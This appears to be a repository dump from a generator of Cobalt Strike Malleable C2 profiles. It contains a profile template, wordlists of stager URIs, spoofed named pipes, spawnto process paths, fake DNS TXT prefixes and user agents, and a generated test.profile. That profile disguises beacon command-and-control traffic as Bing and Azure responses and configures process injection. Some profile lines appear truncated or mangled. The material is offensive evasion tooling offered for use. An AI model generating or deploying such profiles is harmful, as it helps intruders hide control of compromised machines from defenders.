"Content-Type" "${http_getReq_ContentType}"; 214 | ${get_server_header1} 215 | ${get_server_header2} 216 | ${get_server_header3} 217 | ${get_server_header4} 218 | output { 219 | ${get_server_encode} 220 | prepend "${get_server_prepend}"; 221 | prepend "${get_server_prepend2}"; 222 | append "${get_server_append}"; 223 | print; 224 | } 225 | } 226 | } 227 | 228 | ## HTTP POST 229 | http-post { 230 | 231 | set uri "${http_post_uri}"; 232 | set verb "POST"; 233 | 234 | client { 235 | 236 | header "Content-Type" "${post_client_content}"; 237 | ${post_client_header1} 238 | ${post_client_header2} 239 | ${post_client_header3} 240 | ${post_client_header4} 241 | #header "Host" "${http_post_host}"; 242 | 243 | id { 244 | base64url; 245 | parameter "__formid"; 246 | } 247 | 248 | ${post_client_parameter1} 249 | ${post_client_parameter2} 250 | ${post_client_parameter3} 251 | output { 252 | base64url; 253 | prepend "aid_=522005705&accver=1&showtype=embed&ua="; 254 | print; 255 | } 256 | } 257 | 258 | server { 259 | 260 | header "Server" "${post_server_server}"; 261 | header "Content-Type" "${post_server_content}"; 262 | ${post_server_header1} 263 | ${post_server_header2} 264 | ${post_server_header3} 265 | ${post_server_header4} 266 | output { 267 | ${post_server_encode} 268 | prepend "${post_server_prepend}"; 269 | prepend "${post_server_prepend2}"; 270 | append "${post_server_append}"; 271 | print; 272 | } 273 | } 274 | } 275 | -------------------------------------------------------------------------------- /src/main/resources/wordlists/dns_idle: -------------------------------------------------------------------------------- 1 | 223.5.5.5 2 | 8.8.4.4 3 | 8.8.8.8 4 | 101.226.4.6 5 | 114.114.114.114 6 | 119.29.29.29 7 | 223.6.6.6 8 | 114.114.115.115 9 | 114.114.114.119 10 | 9.9.9.9 11 | 149.112.112.112 -------------------------------------------------------------------------------- /src/main/resources/wordlists/dns_stager_prepend: -------------------------------------------------------------------------------- 1 | v=spf1 a:mail.google.com -all 2 | google-site-verification= 3 | microsoft-site-verification= 4 | amazon-site-verification= -------------------------------------------------------------------------------- /src/main/resources/wordlists/dns_stager_subhost: -------------------------------------------------------------------------------- 1 | .m.123456. 2 | .ftp.123456. 3 | .imap.123456. 4 | .pop.123456. 5 | .smtp.123456. 6 | .mail.123456. 7 | .webmail.123456. 8 | .blog.123456. 9 | .wiki.123456. 10 | .support.123456. 11 | .kb.123456. 12 | .help.123456. 13 | .go.123456. 14 | .static.123456. 15 | .api.123456. 16 | .dev.123456. 17 | .events.123456. 18 | .feeds.123456. 19 | .forums.123456. 20 | .groups.123456. 21 | .img.123456. 22 | .media.123456. 23 | .news.123456. 24 | .sites.123456. 25 | .admin.123456. 26 | .mysql.123456. 27 | .store.123456. 28 | .vpn.123456. 29 | .admin.123456. 30 | .beta.123456. 31 | .photos.123456. 32 | .files.123456. 33 | .resources.123456. 34 | .secure.123456. 35 | .ssl.123456. 36 | .apps.123456. 37 | .pic.123456. 38 | .status.123456. 39 | .mobile.123456. 40 | .search.123456. 41 | .live.123456. 42 | .videos.123456. 43 | .lists.123456. -------------------------------------------------------------------------------- /src/main/resources/wordlists/parameters: -------------------------------------------------------------------------------- 1 | srchtxt 2 | srchtype 3 | searchid 4 | ascdesc 5 | seltableid 6 | srchuid 7 | srchuname 8 | srchfrom 9 | srchfilter 10 | viewgroup 11 | fupid 12 | groupid 13 | parentid 14 | fup 15 | jointype 16 | gviewperm 17 | checkall 18 | srchuser 19 | targetlevel 20 | suid 21 | grouppwd 22 | recommend 23 | goto 24 | ordertype 25 | modthreadkey 26 | specialtype 27 | archiveid 28 | showoldetails 29 | showpic 30 | sortall 31 | searchsortid 32 | rewardtype 33 | searchsort 34 | forumdefstyle 35 | leftsidestatus 36 | checkrush 37 | stand 38 | viewpid 39 | ctid 40 | threadindex 41 | cedit 42 | infloat 43 | ajaxtarget 44 | readperm 45 | specialextra 46 | firstpid 47 | addtrade 48 | invitecode 49 | posttime 50 | aids 51 | display 52 | groupname 53 | selectname 54 | imgurl 55 | newthread 56 | uncheck 57 | wysiwyg 58 | operations 59 | sendreasonpm 60 | redirect 61 | location 62 | topiclist 63 | frommodcp 64 | request 65 | findpost 66 | noupdate 67 | nothumb 68 | searchkey 69 | apitype 70 | offlinestatus 71 | password 72 | newfee 73 | newnumber 74 | newbuyername 75 | newbuyercontact 76 | newbuyerzip 77 | newbuyerphone 78 | newbuyermobile 79 | newbuyermsg 80 | number 81 | transport 82 | buyermsg 83 | buyerzip 84 | buyerphone 85 | buyermobile 86 | buyername 87 | buyercontact 88 | offline 89 | nocache 90 | atid 91 | ap_id 92 | adv_title 93 | adv_url 94 | adv_image 95 | slide_sort 96 | adv_id 97 | ap_name 98 | ap_intro 99 | ap_class 100 | ap_display 101 | ap_height 102 | ap_width 103 | default_content 104 | ap_background_color 105 | user_notice 106 | template_code 107 | cash_min 108 | multiple 109 | poundage 110 | module_name 111 | is_menu 112 | is_control_auth 113 | is_dev 114 | module_picture 115 | module_id 116 | album_name 117 | aclass_id_array 118 | album_id 119 | pic_id_array 120 | album_cover 121 | fieldname 122 | fieldvalue 123 | pic_id 124 | short_title 125 | article_id_array 126 | commend_flag 127 | comment_flag 128 | attachment_path 129 | comment_count 130 | share_count 131 | consult_id 132 | consult_reply 133 | refund_express_company 134 | refund_shipping_no 135 | goods_group_id 136 | is_shipping_fee 137 | is_stock 138 | is_read 139 | apply_type -------------------------------------------------------------------------------- /src/main/resources/wordlists/pipename: -------------------------------------------------------------------------------- 1 | lsarpc_## 2 | samr_## 3 | netlogon_## 4 | wkssvc_## 5 | srvsvc_## 6 | mojo_## -------------------------------------------------------------------------------- /src/main/resources/wordlists/spawnto: -------------------------------------------------------------------------------- 1 | %windir%\\syswow64\\eventvwr.exe %windir%\\sysnative\\eventvwr.exe 2 | %windir%\\syswow64\\taskeng.exe %windir%\\sysnative\\taskeng.exe 3 | %windir%\\syswow64\\spoolsv.exe %windir%\\sysnative\\spoolsv.exe 4 | %windir%\\syswow64\\dllhost.exe %windir%\\sysnative\\dllhost.exe 5 | %windir%\\syswow64\\gpupdate.exe %windir%\\sysnative\\gpupdate.exe 6 | %windir%\\syswow64\\explorer.exe %windir%\\sysnative\\explorer.exe -------------------------------------------------------------------------------- /src/main/resources/wordlists/stager_uri: -------------------------------------------------------------------------------- 1 | /api/v2/datafeed /api/v3/datafeed 2 | /webapi/v6/Update /webapi/v3/Update 3 | /api/v1/canopy/check-socket /api/v2/canopy/check-socket 4 | /api/v3/commonservice /api/v5/commonservice 5 | /api/customization/favicon /api/customizationer/favicons 6 | /api/action/play/1/u573au666f1 /api/action/play/1/u573au666f2 7 | /api/v2/integrations/ceibal /api/v3/integrations/ceibal 8 | /api/v3/abtest/analytics/48fd0ae5-5d7e-4cab-afcf-c4cc42f24855 /api/v2/abtest/analytics/48fd0ae5-5d7e-4cab-afcf-c4cc42f24855 9 | /api/v1/frontend/error /api/v3/frontend/error 10 | /api/v1/user/ticket /api/v2/user/ticket -------------------------------------------------------------------------------- /src/main/resources/wordlists/useragents: -------------------------------------------------------------------------------- 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 2 | Mozilla/5.0 (iPad; CPU iPad OS 5_1_1 like Mac OS X) AppleWebKit/536.1 (KHTML, like Gecko) CriOS/46.0.850.0 Mobile/40I689 Safari/536.1 3 | Mozilla/5.0 (iPad; CPU iPad OS 9_3_5 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) CriOS/63.0.888.0 Mobile/87Y454 Safari/535.0 4 | Mozilla/5.0 (iPad; CPU iPad OS 6_1_6 like Mac OS X) AppleWebKit/536.1 (KHTML, like Gecko) FxiOS/17.5d2973.0 Mobile/56S750 Safari/536.1 5 | Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/604.1.28 (KHTML, like Gecko) CriOS/96.0.4664.53 Mobile/14E5239e Safari/602.1 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763 7 | Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko 8 | Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 9 | Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/31.0.1650.18 Mobile/11B554a Safari/8536.25 10 | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/4.0) 11 | Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/4.0) 12 | Mozilla/5.0 (iPad; CPU iPad OS 10_3_4 like Mac OS X) AppleWebKit/535.1 (KHTML, like Gecko) CriOS/14.0.860.0 Mobile/48W083 Safari/535.1 13 | Mozilla/5.0 (iPad; CPU iPad OS 6_1_6 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/26.0.861.0 Mobile/13D727 Safari/531.1 14 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/48.0.852.0 Safari/534.2 15 | Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/5.0) 16 | Opera/8.98.(Windows CE; ko-KR) Presto/2.9.170 Version/11.00 17 | Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 4.0; Trident/4.0) 18 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582 19 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19577 20 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931 21 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586 22 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246 23 | Mozilla/5.0 (Windows NT 4.0) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/13.0.883.0 Safari/532.1 24 | Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/533.24.3 (KHTML, like Gecko) Version/5.0 Safari/533.24.3 25 | Mozilla/5.0 (iPad; CPU iPad OS 14_2 like Mac OS X) AppleWebKit/535.1 (KHTML, like Gecko) FxiOS/16.0x3961.0 Mobile/06N899 Safari/535.1 26 | Mozilla/5.0 (Linux; Android 2.2.2) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/59.0.803.0 Safari/534.2 27 | Mozilla/5.0 (iPad; CPU iPad OS 10_3_4 like Mac OS X) AppleWebKit/532.1 (KHTML, like Gecko) CriOS/30.0.834.0 Mobile/77D555 Safari/532.1 28 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_11_7) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/27.0.899.0 Safari/532.2 29 | Mozilla/5.0 (iPad; CPU iPad OS 5_1_1 like Mac OS X) AppleWebKit/535.2 (KHTML, like Gecko) FxiOS/10.9y6286.0 Mobile/07K099 Safari/535.2 30 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_7 rv:4.0; ps-AF) AppleWebKit/532.43.6 (KHTML, like Gecko) Version/5.0 Safari/532.43.6 31 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/47.0.856.0 Safari/534.1 32 | Mozilla/5.0 (iPad; CPU iPad OS 3_1_3 like Mac OS X) AppleWebKit/533.1 (KHTML, like Gecko) FxiOS/15.5y8112.0 Mobile/22K809 Safari/533.1 33 | Mozilla/5.0 (iPad; CPU iPad OS 10_3_3 like Mac OS X) AppleWebKit/532.0 (KHTML, like Gecko) CriOS/63.0.825.0 Mobile/59Q933 Safari/532.0 34 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_0 rv:2.0; bs-BA) AppleWebKit/532.2.5 (KHTML, like Gecko) Version/4.0.4 Safari/532.2.5 -------------------------------------------------------------------------------- /test.profile: -------------------------------------------------------------------------------- 1 | ## Cobalt Strike Malleable C2 Profile 2 | ## Version: Cobalt Strike 4.2 3 | ## Date : 2022-01-14 14:57:17 4 | 5 | ## Profile Name 6 | ##set sample_name "CobaltStrike Beacon"; 7 | 8 | ## Sleep Times 9 | set sleeptime "39000"; 10 | set jitter "14"; 11 | set data_jitter "107"; 12 | 13 | ## Beacon User-Agent 14 | set useragent "Mozilla/5.0 (Windows NT 4.0) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/13.0.883.0 Safari/532.1"; 15 | 16 | ## Self-signed SSL Certificates with SSL Beacon 17 | ## Stager 18 | https-certificate { 19 | set C "TG"; 20 | set CN "www.bing.com"; 21 | set O "bing.com"; 22 | set OU "bing.com"; 23 | set validity "365"; 24 | } 25 | 26 | ## TCP Beacon 27 | set tcp_port "25076"; 28 | set tcp_frame_header "\x80"; 29 | 30 | ## SMB beacons 31 | set pipename "mojo.5688.8052.183894939787088877##"; 32 | set pipename_stager "mojo.5688.8052.35780273329370473##"; 33 | set smb_frame_header "\x80"; 34 | 35 | ## DNS beacons 36 | set maxdns "251"; 37 | set dns_max_txt "248"; 38 | set dns_idle "8.8.4.4"; 39 | set dns_sleep "0"; 40 | set dns_stager_prepend "v=spf1 a:mail.google.com -all"; 41 | set dns_stager_subhost ".img.123456."; 42 | 43 | ## SSH beacons 44 | set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)"; 45 | set ssh_pipename "wkssvc##"; 46 | 47 | #code-signer { 48 | # set keystore "keystore.jks"; 49 | # set password "123456"; 50 | # set alias "google"; 51 | #} 52 | 53 | ## Staging process 54 | set host_stage "false"; 55 | http-stager { 56 | set uri_x86 "/webapi/v6/Update"; 57 | set uri_x64 "/webapi/v3/Update"; 58 | 59 | server { 60 | header "Content-Type" "application/x-javascript; charset=utf-8"; 61 | header "Server" "Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0"; 62 | header "ETag" "0x8D817F967913E10"; 63 | header "Content-MD5" "v6UAv4ZT5/VxZIZKh5Y+eQ=="; 64 | header "x-ms-lease-status" "unlocked"; 65 | header "timing-allow-origin" "*"; 66 | output { 67 | prepend " t(n){for(var i=[],t=0;t 64bit injection) AND injection across session boundaries 120 | RtlCreateUserThread; 121 | } 122 | } 123 | 124 | ## HTTP Headers 125 | http-config { 126 | set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; 127 | header "Server" "Apache"; 128 | header "Keep-Alive" "timeout=10, max=100"; 129 | header "Connection" "Keep-Alive"; 130 | # Use this option if your teamserver is behind a redirector 131 | set trust_x_forwarded_for "true"; 132 | } 133 | 134 | ## HTTP GET 135 | http-get { 136 | 137 | set uri "/rp/olDmcxJ0RfBy1PQIY51XMK-7EcM.gz.js"; 138 | set verb "GET"; 139 | 140 | client { 141 | 142 | header "Accept-Encoding" "gzip, deflate"; 143 | header "Connection" "close"; 144 | header "Referer" "https://www.bing.com/"; 145 | 146 | 147 | #header "Host" "r.bing.com"; 148 | 149 | metadata { 150 | base64url; 151 | prepend "ANID="; 152 | prepend "__Secure-3PAPISID=noskin;"; 153 | append ";CONSENT=YES+CN.zh-CN+20210917-09-0"; 154 | header "Cookie"; 155 | } 156 | } 157 | 158 | server { 159 | 160 | header "Server" "Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0"; 161 | header "Content-Type" "application/x-javascript; charset=utf-8"; 162 | header "X-MSEdge-Ref" "Ref A4EAA043E47314793BBFE1CFBD4810146 Ref BHKG30EDGE0820 Ref C2022-01-14T06:52:58Z"; 163 | header "X-Azure-Ref-OriginShield" "Ref A03E6EA3B4D8B47E88C93E210C6734EDB Ref BSG2EDGE2422 Ref C2022-01-10T06:59:52Z"; 164 | header "Cache-Control" "public, max-age=432000"; 165 | header "x-ms-lease-status" "unlocked"; 166 | output { 167 | netbiosu; 168 | prepend "biUtil.rt.querySelectorAll(\".sbiinflnk[data-link]\"),r=function(t){var i=t.target;i.hasAttribute(n)&&(i.href=i.getAttribute("; 169 | prepend "var SbiPrivacy;(function(){function t(){var i,r,t,u;if(typeof SbiUtil!=\"undefined\"&&SbiUtil.rt&&_d.querySelectorAll)for(i=S"; 170 | append "n),i.removeAttribute(n))},t=0;t0?lt():g())}function lt(){a(u,\"rigleamon\")}function g(){v(u,\"rigleamon\")}function nt(n){if(sj_evt.fire(\"focusChange\",\"bep\"),i){i.firstChild||(r=t(\"iframe\"),r.id=\"bepfm\",r.frameBorder=\"no\",r.scrolling=\"no\",r.height=0,sj_be(r,tt,yt,!1),i.appendChild(r),f=t(\"div\"),f.id=\"bepfl\",f.innerText=f.textContent=\"Loading...\",i.appendChild(f),vt(f));var w=_w.location.search.substr(1),g=/(^|&)rewardstesthooks=1(&|$)/i.exec(w),b=/(?:^|&)rewardsbag=([^&]*)(?:&|$)/i.exec(w),s=new Date,k=s.getDate(),d=s.getMonth()+1,nt=(d<10?\"0\":\"\")+d+\"/\"+(k<10?\"0\":\"\")+k+\"/\"+s.getFullYear();r.src=\"/rewardsapp/bepflyoutpage?style=modular&date=\"+nt+(g&&b?\"&atlahostname=localhost&bag=\"+b[1]:\"\""; 217 | prepend ""; 219 | print; 220 | } 221 | } 222 | } 223 | --------------------------------------------------------------------------------